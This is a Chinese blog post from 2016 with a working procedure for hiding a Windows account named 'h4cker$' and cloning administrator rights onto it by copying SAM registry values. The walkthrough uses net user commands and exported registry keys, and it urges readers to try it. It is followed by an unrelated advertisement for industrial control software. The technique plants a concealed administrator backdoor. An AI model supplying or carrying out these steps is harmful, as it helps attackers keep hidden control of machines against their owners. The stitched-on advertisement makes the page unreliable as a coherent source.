隐藏和克隆管理员[REG]

互联网/新科技 beaji 2016-06-11 20:12 1376 0

 

一、得到要克隆的账号信息

1Net user h4cker$ 123 /add

2、导出 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\h4cker$]

3、查看导出[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\h4cker$]里的默认值

示例

====================我是分割线===================================

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\h4cker$]

@=hex(3f0):

====================分割线结束===================================

注意: " 3f0 " 就是我们下一步需要的

4、导出[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F0]

以上我们要克隆的账号h4cker$ 的信息就整理完毕

二、得到正常可用的管理员信息

1、Net user administrator              '查看用户administrator信息

   Net localgroup administrator         '查看用户组administrator信息

注意确保被克隆账号的正常和权限(是否禁用和用户组)

2、查看[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\administrator]的默认值

示例

====================我是分割线===================================

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\administrator]

@=hex(1f4):

====================分割线结束===================================

注意: " 1f4 " 就是我们下一步需要的

3、导出 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]

OK!被克隆账号的信息收集完毕下面要开始"克隆" ^!^

三、克隆开始喽!

1Net user h4cker$ /del    '删除账号h4cker$

2、复制

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]下二进制"F"的数据

   覆盖

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F0]下二进制"F"的数据

并保存!

3、导入[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\h4cker$]和修改过的

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F0]

4、打完收工! 赶快试试吧~




五大“核芯”产品,一大“技术输出”: 【智慧集团管控平台】: 关键词:【集团专属系统平台】,【实时对比】各区域工厂【同一时间段的生产数据】。 【智能工厂管家】:(MES) 关键词:【现场监控可视化、业务流程规范化、生产管理精细化、能源利用合理化、资源配置最优化、调度决策科学化】。 【智能调度器】:(APC) 关键词:【智能控制】,【关键参数实时优化推荐】,【长期稳定运行】 【孪生工厂】: 关键词:【工厂实体建模】,【设备预警】,【关键参数】、【实时展示大屏】 【超低排放助手】: 关键词:【超低排放】,同时降低【20%】以上的还原剂使用量。 【一大技术输出】  技术成品输出:  关键词:提供【成品软件】,或【专项定制研发软件】。  技术能力输出:  关键词:【专业技术团队】、【驻扎项目】

评论区